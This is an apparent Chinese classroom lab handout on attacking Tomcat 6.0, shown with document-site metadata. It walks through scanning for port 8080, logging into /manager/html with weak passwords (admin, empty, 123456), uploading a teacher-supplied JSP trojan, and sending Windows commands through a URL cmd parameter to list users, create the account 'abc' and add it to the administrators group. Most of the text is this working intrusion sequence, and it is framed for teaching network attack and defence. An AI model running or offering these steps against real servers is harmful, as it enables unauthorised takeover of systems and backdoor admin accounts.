第2个实验 Tomcat6.0的漏洞攻击1(网络攻防教程)
- 格式:doc
- 大小:26.50 KB
- 文档页数:2
实验二Tomcat6.0的漏洞攻击
【实验目的】
通过端口扫描工具扫描8080端口,猜测弱口令:空admin 。
【实验环境】
系统环境:Windows2003及以上操作系统
软件工具:scanport
【实验内容】
1.使用Scanport工具扫描8080端口;
2.扫描后,得到一些主机IP,选中其中一台,例如:172.16.28.242
然后在地址栏中,进行这样的访问:
http://172.16.28.242:8080/manager/html
如果跳出登录窗口,请输入用户名:admin 密码:空或admin
或123456;
3.如果第2步登录成功,上传老师给的JSP木马。
4.在网址中利用命令,格式如下:
查看用户
http://172.16.28.242:8080/index1/index.jsp?cmd=net user
新建用户:
http://172.16.28.242:8080/index1/index.jsp?cmd=net user abc 123456 /add 升为超级管理员:
http://172.16.28.242:8080/index1/index.jsp?cmd=net localgroup
administrators abc /add